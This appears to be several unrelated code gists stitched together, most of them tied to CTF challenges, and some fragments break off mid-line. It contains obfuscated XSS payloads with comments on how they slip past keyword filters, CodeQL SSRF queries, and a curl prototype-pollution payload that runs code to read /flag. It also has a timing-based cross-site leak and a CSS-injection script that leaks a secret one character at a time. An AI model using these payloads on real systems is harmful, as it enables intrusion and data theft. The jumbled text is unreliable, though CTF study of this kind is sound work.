// create viewer element
init = () => {
const renderer = document.querySelector('#renderer')
const viewer = document.createElement('div')
viewer.style = `
position: absolute;
top: 0;
left: 0;
width: 100%;
height: 100%;
tyage / bonsai-xss.js
Last active Oct 23, 2020
SECCON CTF 2014 Online Qualifications, XSS Bonsai writeup
// SECCON 2014 "XSS Bonsai" payloads. Each line is the same primitive written a
// different way, presumably so the challenge's filter never sees the literal
// tokens "constructor", "alert" or "XSS": those strings are rebuilt at runtime
// (slice/substr with arithmetic offsets, or replace() stripping a junk suffix),
// then []["constructor"]["constructor"] resolves to the Function constructor,
// which is called with the text "alert('XSS')" and invoked.
// The leading `";`, `\";` and `',(` terminate a double-quoted, an escaped
// double-quoted, and a single-quoted string context respectively; the trailing
// `//` (or `,'`) neutralises whatever follows in the original statement.
// Detection note: keyword-based signature matching on "constructor"/"alert"
// does not fire on any of these, because the words never appear whole.
";hoge14='constructorhoge14'.slice(84645-84645,84656-84645);hoge15='alerthoge14'.slice(84645-84645,84650-84645);hoge16='XSShoge14'.slice(84645-84645,84648-84645);[][hoge14][hoge14](hoge15+'(\''+hoge16+'\')')()//
\";hoge17='constructorhoge17'.substr(45998-45998,46009-45998);hoge18='alerthoge17'.substr(45998-45998,46003-45998);hoge19='XSShoge17'.substr(45998-45998,46001-45998);[][hoge17][hoge17](hoge18+'(\''+hoge19+'\')')()//
',(hoge20='constructorhogee'.replace('hogee',''),hoge21='alerthogee'.replace('hogee',''),hoge22='XSShogee'.replace('hogee',''),[][hoge20][hoge20](hoge21+'(\''+hoge22+'\')')()),'
")};hoge30=88831-88831;hoge31='cccchoge30'.split('')[hoge30]+'oooohoge30'.split('')[hoge30]+'nnnnhoge30'.split('')[hoge30]+'sssshoge30'.split('')[hoge30]+'tttthoge30'.split('')[hoge30]+'rrrrhoge30'.split('')[hoge30]+'uuuuhoge30'.split('')[hoge30]+'cccchoge30'.split('')[hoge30]+'tttthoge30'.split('')[hoge30]+'oooohoge30'.split('')[hoge30]+'rrrrhoge30'.split('')[hoge30];hoge32='aaaahoge30'.split('')[hoge30]+'llllhoge
import javascript
import DataFlow
import DataFlow::PathGraph
class SSRFConfiguration extends TaintTracking::Configuration {
SSRFConfiguration() { this = "SSRFConfiguration" }
override predicate isSource(DataFlow::Node source) {
exists(DataFlow::SourceNode req |
isHTTPRequest(req) and
import javascript
import DataFlow::PathGraph
// TODO: add a constraint restricting this to "@nguniversal/express-engine"
class Configuration extends TaintTracking::Configuration {
Configuration() { this = "Angular SSRF" }
// string not start with https?:// or //
override predicate isSource(DataFlow::Node source) {
source.getStringValue().regexpMatch("^(?!(https?:|//)).*$")

flag 1 (Bypass path restriction with Angular router)

If you can get /debug/answer rendered on the server side, you obtain the first flag.

Nginx denies access to /debug.

  location /debug {
    # IP address restriction.
    # TODO: add allowed IP addresses here
# Prototype-pollution probe against the json-schema "validate" endpoint.
# `$i` (the last octet of the target host) is not defined in this file; it must
# come from an enclosing loop or the environment, otherwise the URL is malformed.
# The submitted schema nests a property literally named "__proto__" whose
# sub-properties carry "default" values. If the validator applies defaults by
# walking the schema, those defaults land on Object.prototype, so every object
# later gains `outputFunctionName` and `path`. The `outputFunctionName` default
# is JavaScript that reads /flag (spelled `/fl`+`ag`) and returns it -- it is
# presumably evaluated as code by the template engine, which is what turns the
# pollution into code execution (confirm against the server's renderer).
# Server-side mitigation: refuse to apply defaults to keys named
# __proto__ / constructor / prototype, or build the validated object with
# Object.create(null) so there is no prototype to pollute.
curl http://10.13.37.$i:14017/config/validated/json-schema/validate -H 'content-type: application/json' --data '{"$schema":{"type":"object","properties":{"__proto__":{"type":"object","properties":{"outputFunctionName":{"type":"string","default":"x;var buf = Buffer.alloc(128);var fs = process.mainModule.require(`fs`);var fd=fs.openSync(`/fl`+`ag`);fs.readSync(fd, buf, 0, 128);fs.closeSync(fd);return buf.toString();//x"},"path":{"type":"string","default":"/foo"}}}}}}'
<script>
setTimeout(() => {
(new Image()).src='/start';
var start = performance.now();
fetch("https://www.materialui.co/materialIcons/navigation/close_black_72x72.png", {
mode: "no-cors",
credentials: "include"
}).then((response) => {
var end = performance.now();
1a2
>
222,223d222
< do_action('wp_print_scripts');
<
225,228d223
<
< # remove theCode
< $content = preg_replace('/<p class="theCode[^<]+<\/p>/', '', $content);
<
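# Point distracting sites at localhost by appending entries to /etc/hosts.
# Needs root: the redirect into /etc/hosts is the privileged step.
# printf replaces the original echo: bash's builtin echo does not expand "\t"
# without -e, which would have written a literal backslash-t into /etc/hosts
# instead of the whitespace separator the hosts format requires.
for host in twitter.com www.facebook.com slack.com anond.hatelabo.jp; do
  # Skip hosts that already have an entry so re-running does not pile up duplicates.
  if ! grep -q "[[:space:]]${host}\$" /etc/hosts; then
    printf '127.0.0.1\t%s\n' "$host" >> /etc/hosts
  fi
done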
prefix = 'L0LC47S_43V3R'
grecaptcha.execute(recaptcha_id, {action: 'report'}).then((token) => send('/report ' + token));
setTimeout(() => {
fetch(`send?name=${encodeURIComponent('/secret wao; Domain=a.cat-chat.web.ctfcompetition.com')}&msg=dog`)
}, 2000);
setTimeout(() => {
let payload = ''
for(let i = '0'.charCodeAt(0); i <= '9'.charCodeAt(0); ++i) {
let a = String.fromCharCode(i)
payload += `span[data-secret^=${prefix}${a}]{background:url(./send?name=a&msg=flag%20${a})}`